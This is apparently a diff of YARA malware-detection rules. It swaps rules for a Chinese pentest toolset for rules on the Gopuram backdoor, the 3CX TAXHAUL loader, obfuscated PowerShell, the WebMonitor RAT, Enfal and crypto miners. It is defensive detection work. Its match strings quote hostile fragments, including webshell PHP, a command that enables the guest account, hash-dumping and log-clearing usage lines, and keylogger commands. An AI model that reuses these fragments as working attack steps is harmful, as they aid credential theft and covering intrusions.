+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Gethashes_2 : FILE
+
+rule SIGNATURE_BASE_APT_MAL_Gopuram_Backdoor_Apr23 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file GetHashes.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "31117d2e-caf1-58c9-8525-b40b73097928"
-		date = "2015-06-23"
+		description = "Detects Gopuram backdoor"
+		author = "X__Junior (Nextron Systems)"
+		id = "3ae5ddcb-5601-5dca-85dd-0a4772577fae"
+		date = "2023-02-24"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1807-L1823"
+		reference = "https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_mal_gopuram_apr23.yar#L20-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "35ae9ccba8d607d8c19a065cf553070c54b091d8"
-		logic_hash = "778fde2c59d4523142c0ac5b5c953c9eedbbf3c00b406541c00c1aa1f1a9cc58"
-		score = 70
+		logic_hash = "aa3dd1f35d27d23eb775410cceae81d5b767dc0f1636aac67f2d2e988a3ed995"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "beb775af5196f30e0ee021790a4978ca7a7ac2a7cf970a5a620ffeb89cc60b2c"
+		hash2 = "97b95b4a5461f950e712b82783930cb2a152ec0288c00a977983ca7788342df7"
 
 	strings:
-		$s1 = "GetHashes.exe <SAM registry file> [System key file]" fullword ascii
-		$s2 = "GetHashes.exe $Local" fullword ascii
-		$s3 = "The system key doesn't match SAM registry file!" fullword ascii
+		$x1 = "%s\\config\\TxR\\%s.TxR.0.regtrans-m" ascii
+		$xop = { D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE }
+		$opa1 = { 48 89 44 24 ?? 45 33 C9 45 33 C0 33 D2 89 5C 24 ?? 48 89 74 24 ?? 48 89 5C 24 ?? 89 7C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? 4C 8D 4C 24 ?? 44 8D 43 }
+		$opa2 = { 48 89 B4 24 ?? ?? ?? ?? 44 8D 43 ?? 33 D2 48 89 BC 24 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 45 33 C0 33 D2 8B F8 E8 ?? ?? ?? ?? 8D 4F ?? E8 ?? ?? ?? ?? 4C 8B 4C 24 ?? 44 8D 43 ?? 48 8B C8 8B D7 48 8B F0 44 8B F7 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? E8  }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and 2 of them
+		( uint16( 0 ) == 0x5A4D and filesize < 2MB and pe.characteristics & pe.DLL and 1 of ( $x* ) ) or all of ( $opa* )
 }
-rule SIGNATURE_BASE_SUSP_Patcher_Keygen_Indicators_Jun15 : FILE
+rule SIGNATURE_BASE_APT_NK_MAL_DLL_Apr23_1 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset"
+		description = "Detects DLLs loaded by shellcode loader (6ce5b6b4cdd6290d396465a1624d489c7afd2259a4d69b73c6b0ba0e5ad4e4ad) (relation to Lazarus group)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4dd65e4b-8178-5576-9740-b3c80a8127e2"
-		date = "2015-06-23"
+		id = "c2abe266-0c21-51aa-9426-46a4f59df937"
+		date = "2023-04-03"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1825-L1841"
+		reference = "https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_mal_gopuram_apr23.yar#L43-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e32f5de730e324fb386f97b6da9ba500cf3a4f8d"
-		logic_hash = "07735c380cf34aaabd5cc0e1b38e32b3d4ad86b7bb184188d446df537f66775e"
-		score = 70
+		logic_hash = "e0a8f3896c0119ce399e83fe3e565c66144693e84996aa3d01ca1b6315521782"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "69dd140f45c3fa3aaa64c69f860cd3c74379dec37c46319d7805a29b637d4dbf"
+		hash3 = "bb1066c1ca53139dc5a2c1743339f4e6360d6fe4f2f3261d24fc28a12f3e2ab9"
+		hash4 = "dca33d6dacac0859ec2f3104485720fe2451e21eb06e676f4860ecc73a41e6f9"
+		hash5 = "fe948451df90df80c8028b969bf89ecbf501401e7879805667c134080976ce2e"
 
 	strings:
-		$s0 = "<description>Patch</description>" fullword ascii
-		$s2 = "\\dup2patcher.dll" ascii
-		$s3 = "load_patcher" fullword ascii
+		$x1 = "vG2eZ1KOeGd2n5fr" ascii fullword
+		$s1 = "Windows %d(%d)-%s" ascii fullword
+		$s2 = "auth_timestamp: " ascii fullword
+		$s3 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" wide fullword
+		$op1 = { b8 c8 00 00 00 83 fb 01 44 0f 47 e8 41 8b c5 48 8b b4 24 e0 18 00 00 4c 8b a4 24 e8 18 00 00 48 8b 8d a0 17 00 00 48 33 cc }
+		$op2 = { 33 d2 46 8d 04 b5 00 00 00 00 66 0f 1f 44 00 00 49 63 c0 41 ff c0 8b 4c 84 70 31 4c 94 40 48 ff c2 }
+		$op3 = { 89 5c 24 50 0f 57 c0 c7 44 24 4c 04 00 00 00 c7 44 24 48 40 00 00 00 0f 11 44 24 60 0f 11 44 24 70 0f 11 45 80 0f 11 45 90 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 4000KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $x* ) or 2 of them ) or ( $x1 and 1 of ( $s* ) or 3 of them )
 }
-rule SIGNATURE_BASE_CN_Honker_Tuoku_Script_Oracle_2 : FILE
+rule SIGNATURE_BASE_APT_UNC4736_NK_MAL_TAXHAUL_3CX_Apr23_1 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file oracle.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b88a0faa-1616-5f1b-80dc-6e6a2f0cb671"
-		date = "2015-06-23"
+		description = "Detects TAXHAUL (AKA TxRLoader) malware used in the 3CX compromise by UNC4736"
+		author = "Mandiant"
+		id = "25a80f98-03d6-59e6-84e6-6d847a6c591e"
+		date = "2023-03-04"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1843-L1858"
+		reference = "https://www.3cx.com/blog/news/mandiant-initial-results/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_mal_gopuram_apr23.yar#L77-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "865dd591b552787eda18ee0ab604509bae18c197"
-		logic_hash = "627d81323266d67a2402367918b4f6e7277367c3eb027af57ac6966f2a49472c"
-		score = 70
+		logic_hash = "f67af611d0b3d96e4aaf7b3b5e49c1fb536e61a430b79ac0a0560ef3773ba140"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "webshell" fullword ascii
-		$s1 = "Silic Group Hacker Army " fullword ascii
+		$p00_0 = {410f45fe4c8d3d[4]eb??4533f64c8d3d[4]eb??4533f64c8d3d[4]eb}
+		$p00_1 = {4d3926488b01400f94c6ff90[4]41b9[4]eb??8bde4885c074}
 
 	condition:
-		filesize < 3KB and all of them
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule SIGNATURE_BASE_CN_Honker_Net_Packet_Capt : FILE
+rule SIGNATURE_BASE_Powershell_Isesteroids_Obfuscation
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file net_packet_capt.exe"
+		description = "Detects PowerShell ISESteroids obfuscation"
 		author = "Florian Roth (Nextron Systems)"
-		id = "16e19be7-3805-5e2b-baa6-20554fb7a5cf"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1860-L1878"
+		id = "d686c4de-28fd-5d77-91d4-dde5661b75cd"
+		date = "2017-06-23"
+		modified = "2025-02-12"
+		reference = "https://twitter.com/danielhbohannon/status/877953970437844993"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_obfuscation.yar#L11-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2d45a2bd9e74cf14c1d93fff90c2b0665f109c52"
-		logic_hash = "b158199a27f1260da5f5c1a8e99bb1cc3d19fe2a10577cc5932f097ff39d4ef8"
-		score = 70
+		logic_hash = "6d9476f679614e34a0d13664baffd15b0bdb896f7eeca2c9de66bdc0d65a2eec"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "(*.sfd)" fullword ascii
-		$s2 = "GetLaBA" fullword ascii
-		$s3 = "GAIsProcessorFeature" fullword ascii
-		$s4 = "- Gablto " ascii
-		$s5 = "PaneWyedit" fullword ascii
+		$x1 = "/\\/===\\__" ascii
+		$x2 = "${__/\\/==" ascii
+		$x3 = "Catch { }" fullword ascii
+		$x4 = "\\_/=} ${_" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Cleaniislog : FILE
+rule SIGNATURE_BASE_SUSP_Obfuscted_Powershell_Code
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file CleanIISLog.exe"
+		description = "Detects obfuscated PowerShell Code"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3931ba63-faf5-5b44-879c-105cd2812712"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1880-L1894"
+		id = "e2d8fc9e-ce2b-5118-8305-0d5839561d4f"
+		date = "2018-12-13"
+		modified = "2025-02-12"
+		reference = "https://twitter.com/silv0123/status/1073072691584880640"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_obfuscation.yar#L28-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "827cd898bfe8aa7e9aaefbe949d26298f9e24094"
-		logic_hash = "35b428d6178196b0dc6ac2ea3f0ee1dfbf6a98ead2356cb2a35d3d6b780538cc"
-		score = 70
+		logic_hash = "afd7e4b88c812b23441549565a18fde18c24fe91ec467455002ef338e092ebf9"
+		score = 65
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "Usage: CleanIISLog <LogFile>|<.> <CleanIP>|<.>" fullword ascii
+		$s1 = "').Invoke(" ascii
+		$s2 = "(\"{1}{0}\"" ascii
+		$s3 = "{0}\" -f" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		#s1> 11 and #s2 > 10 and #s3 > 10
 }
-rule SIGNATURE_BASE_CN_Honker_HASH_Pwhash : FILE
+rule SIGNATURE_BASE_SUSP_OBFUSC_Powershell_True_Jun20_1 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file pwhash.exe"
+		description = "Detects indicators often found in obfuscated PowerShell scripts. Note: This detection is based on common characteristics typically associated with the mentioned threats, must be considered a clue and does not conclusively prove maliciousness."
 		author = "Florian Roth (Nextron Systems)"
-		id = "5d8c3648-a725-5f01-9800-b75b8c740cf1"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1896-L1911"
+		id = "e9bb870b-ad72-57d3-beff-2f84a81490eb"
+		date = "2020-06-27"
+		modified = "2025-02-12"
+		reference = "https://github.com/corneacristian/mimikatz-bypass/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_obfuscation.yar#L57-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "689056588f95749f0382d201fac8f58bac393e98"
-		logic_hash = "a77ae11c35dac3cfb1a2970460d4883feed7fbd3e8a860fa7facaad7ddcd1182"
-		score = 70
+		logic_hash = "8f33762e6e93fcf6b423b34eb1abefae2ae91b51048303947f7c1601823630d7"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Example: quarks-pwdump.exe --dump-hash-domain --with-history" fullword ascii
-		$s2 = "quarks-pwdump.exe <options> <NTDS file>" fullword ascii
+		$ = "${t`rue}" ascii nocase
+		$ = "${tr`ue}" ascii nocase
+		$ = "${tru`e}" ascii nocase
+		$ = "${t`ru`e}" ascii nocase
+		$ = "${tr`u`e}" ascii nocase
+		$ = "${t`r`ue}" ascii nocase
+		$ = "${t`r`u`e}" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them
+		filesize < 6000KB and 1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Cleaner_Cl_2 : FILE
+rule SIGNATURE_BASE_MAL_Enfal_Nov22 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file cl.exe"
+		description = "Detects a certain type of Enfal Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9aa36c0a-9e0f-5274-bebe-9179d81b05f7"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1913-L1928"
+		id = "9dcba14e-2175-5da0-8629-5b952c213f6c"
+		date = "2015-02-10"
+		modified = "2023-01-06"
+		old_rule_name = "Enfal_Malware"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_enfal.yar#L1-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "523084e8975b16e255b56db9af0f9eecf174a2dd"
-		logic_hash = "865354152f8441009aaad9022f64c3a014c4df0549b648d66959df56893ab98a"
-		score = 70
+		logic_hash = "bf349ba2b7bd635808b4ee23c6286e7dd403fbc185c6b59f0bb1fbf47ba7d9bb"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash2 = "42fa6241ab94c73c7ab386d600fae70da505d752daab2e61819a0142b531078a"
+		hash2 = "bf433f4264fa3f15f320b35e773e18ebfe94465d864d3f4b2a963c3e5efd39c2"
 
 	strings:
-		$s0 = "cl -eventlog All/Application/System/Security" fullword ascii
-		$s1 = "clear iislog error!" fullword ascii
+		$xop1 = { 00 00 83 c9 ff 33 c0 f2 ae f7 d1 49 b8 ff 8f 01 00 2b c1 }
+		$s1 = "POWERPNT.exe" fullword ascii
+		$s2 = "%APPDATA%\\Microsoft\\Windows\\" ascii
+		$s3 = "%HOMEPATH%" fullword ascii
+		$s4 = "Server2008" fullword ascii
+		$s5 = "%ComSpec%" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 3 of ( $s* ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Sqlmap_Python_Run : FILE
+rule SIGNATURE_BASE_Enfal_Malware_Backdoor : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Run.exe"
+		description = "Generic Rule to detect the Enfal Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "308d929a-0f38-5db4-92c2-2a7bf25bb64f"
-		date = "2015-06-23"
+		id = "4631888c-e1e2-5969-a312-0f0011cd605c"
+		date = "2015-02-10"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1930-L1946"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_enfal.yar#L27-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a51479a1c589f17c77d22f6cf90b97011c33145f"
-		logic_hash = "86d53a06e2f71b7ce7785c4c8ac017a4552b40c16d64474db4e22dbe1afd9e52"
-		score = 70
+		logic_hash = "6ce0c19e666cc0db50194bd56f51beddeee22c787b67810655241fdd4d34a31e"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "6d484daba3927fc0744b1bbd7981a56ebef95790"
+		hash1 = "d4071272cc1bf944e3867db299b3f5dce126f82b"
+		hash2 = "6c7c8b804cc76e2c208c6e3b6453cb134d01fa41"
 
 	strings:
-		$s1 = ".\\Run.log" fullword ascii
-		$s2 = "[root@Hacker~]# Sqlmap " fullword ascii
-		$s3 = "%sSqlmap %s" fullword ascii
+		$x1 = "Micorsoft Corportation" fullword wide
+		$x2 = "IM Monnitor Service" fullword wide
+		$s1 = "imemonsvc.dll" fullword wide
+		$s2 = "iphlpsvc.tmp" fullword
+		$z1 = "urlmon" fullword
+		$z2 = "Registered trademarks and service marks are the property of their respec" wide
+		$z3 = "XpsUnregisterServer" fullword
+		$z4 = "XpsRegisterServer" fullword
+		$z5 = "{53A4988C-F91F-4054-9076-220AC5EC03F3}" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or ( all of ( $s* ) and all of ( $z* ) ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Saminside : FILE
+rule SIGNATURE_BASE_MAL_Webmonitor_RAT : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file SAMInside.exe"
+		description = "Detects WebMonitor RAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c5ac9f0a-d1af-59c3-9c13-91153180f3d8"
-		date = "2015-06-23"
+		id = "5378f22e-4bba-50e7-8374-5135e980e06b"
+		date = "2018-04-13"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1948-L1963"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_webmonitor_rat.yar#L1-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "707ba507f9a74d591f4f2e2f165ff9192557d6dd"
-		logic_hash = "8f095a554121e16b63fdd8d47d957665aed7a2a5885813fa78bc4cee3b8923d3"
-		score = 70
+		logic_hash = "fbf6368527a7bd841b7679d668d6b77ce720fd0f6bcbd5fa9ff6301ae72199ec"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "27aaad8a7b3fd53d99077a9202e8bed05696c843ed2485bea6eb9e33a1c273ac"
+		hash2 = "05111c305028b5d822ecd12de9879560223c42860cc9d448c47886c236648607"
 
 	strings:
-		$s0 = "www.InsidePro.com" fullword wide
-		$s1 = "SAMInside.exe" fullword wide
+		$x1 = "send_keylog_stream_start" fullword wide
+		$x2 = "KEYLOG_STREAM_STOP" fullword wide
+		$s1 = "SHELL_EXEC" fullword wide
+		$s2 = "send_shell_exec" fullword wide
+		$s3 = "send_connections_get" fullword wide
+		$a1 = "Select * from Win32_PerfRawData_PerfProc_Process where IDProcess = '" fullword wide
+		$a2 = "Select * from Win32_Process WHERE handle =" fullword wide
+		$a3 = "Select * from Win32_Process where ProcessId=" fullword wide
+		$a4 = "Select * from Win32_ComputerSystem" fullword wide
+		$a5 = "The service is in the process of being continued" fullword wide
+		$a6 = "tcpdump" fullword wide
+		$a7 = "memdump" fullword wide
+		$a8 = "<val1>Processor</val1>" fullword wide
+		$a9 = "Win32 share process" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 650KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or ( 2 of ( $s* ) and 2 of ( $a* ) ) or 7 of them )
 }
-rule SIGNATURE_BASE_CN_Honker_Webscan_Wwwscan : FILE
+rule SIGNATURE_BASE_SUSP_LNX_SH_Cryptominer_Indicators_Dec20_1 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file wwwscan.exe"
+		description = "Detects helper script used in a crypto miner campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "defe0024-f94a-560a-a9f6-b3849b41f9bb"
-		date = "2015-06-23"
+		id = "e376e0e1-1490-5ad4-8ca2-d28ca1c0b51a"
+		date = "2020-12-31"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1965-L1981"
+		reference = "https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_crypto_miner.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6dbffa916d0f0be2d34c8415592b9aba690634c7"
-		logic_hash = "9d2eee1c1783a08a2eae86d4ea77bdb67db8cf0055a24d88ea09411e63018e8c"
-		score = 70
+		logic_hash = "4acd1b77307dbf23f95f7a2024209bee714c6931182aff16455ea6b7e4a6f287"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3298dbd985c341d57e3219e80839ec5028585d0b0a737c994363443f4439d7a5"
 
 	strings:
-		$s1 = "%s www.target.com -p 8080 -m 10 -t 16" fullword ascii
-		$s2 = "GET /nothisexistpage.html HTTP/1.1" fullword ascii
-		$s3 = "<Usage>:  %s <HostName|Ip> [Options]" fullword ascii
+		$x1 = "miner running" fullword ascii
+		$x2 = "miner runing" fullword ascii
+		$x3 = " --donate-level 1 "
+		$x4 = " -o pool.minexmr.com:5555 " ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
+		filesize < 20KB and 1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Sig_3389_2_3389 : FILE
+rule SIGNATURE_BASE_PUA_WIN_XMRIG_Cryptocoin_Miner_Dec20 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file 3389.exe"
+		description = "Detects XMRIG crypto coin miners"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8b2f5f6d-4d7b-561c-bd77-2de351e5aca8"
-		date = "2015-06-23"
+		id = "4dfb04e9-fbba-5a6f-ad20-d805025d2d74"
+		date = "2020-12-31"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1983-L1999"
+		reference = "https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_crypto_miner.yar#L19-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "48d1974215e5cb07d1faa57e37afa91482b5a376"
-		logic_hash = "97e2a08dd391de44fc01c44ca6463aa009e93ad199a330eb99aaa809f14f2ef0"
-		score = 70
+		logic_hash = "c39aee669a98bcc9d07821aef248096e45a6c54ab22b8b98c0a393b445f3934e"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09"
 
 	strings:
-		$s1 = "C:\\Documents and Settings\\Administrator\\" ascii
-		$s2 = "net user guest /active:yes" fullword ascii
-		$s3 = "\\Microsoft Word.exe" ascii
+		$x1 = "xmrig.exe" fullword wide
+		$x2 = "xmrig.com" fullword wide
+		$x3 = "* for x86, CRYPTOGAMS" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 6000KB and 2 of them or all of them
 }
-rule SIGNATURE_BASE_CN_Honker_PHP_Php11 : FILE
+rule SIGNATURE_BASE_Explosive_EXE : APT FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file php11.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e20eaab1-9799-5e61-9a25-3ac0dcce5f7f"
-		date = "2015-06-23"
+		description = "Explosion/Explosive Malware - Volatile Cedar APT"
+		author = "Check Point Software Technologies Inc."
+		id = "3a9fb6b2-2f19-5d70-81ed-a08c3b8b2d80"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2001-L2017"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_volatile_cedar.yar#L1-L12"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "dcc8226e7eb20e4d4bef9e263c14460a7ee5e030"
-		logic_hash = "d32b0540521a6b1d65c224bdee463813d72846c26f27326a092bdf3b90c3ae7c"
-		score = 70
+		logic_hash = "77eb74586f5ef2878c0d283b925e6e066f704d00525303990cf5ea7988a6637d"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "APT, FILE"
 
 	strings:
-		$s1 = "<tr><td><b><?php if (!$win) {echo wordwrap(myshellexec('id'),90,'<br>',1);} else" ascii
-		$s2 = "foreach (glob($_GET['pathtomass'].\"/*.htm\") as $injectj00) {" fullword ascii
-		$s3 = "echo '[cPanel Found] '.$login.':'.$pass.\"  Success\\n\";" fullword ascii
+		$DLD_S = "DLD-S:"
+		$DLD_E = "DLD-E:"
 
 	condition:
-		filesize < 800KB and all of them
+		all of them and uint16( 0 ) == 0x5A4D
 }
-rule SIGNATURE_BASE_CN_Honker_Webcruiserwvs : FILE
+rule SIGNATURE_BASE_Explosion_Sample_1 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file WebCruiserWVS.exe"
+		description = "Explosion/Explosive Malware - Volatile Cedar APT"
 		author = "Florian Roth (Nextron Systems)"
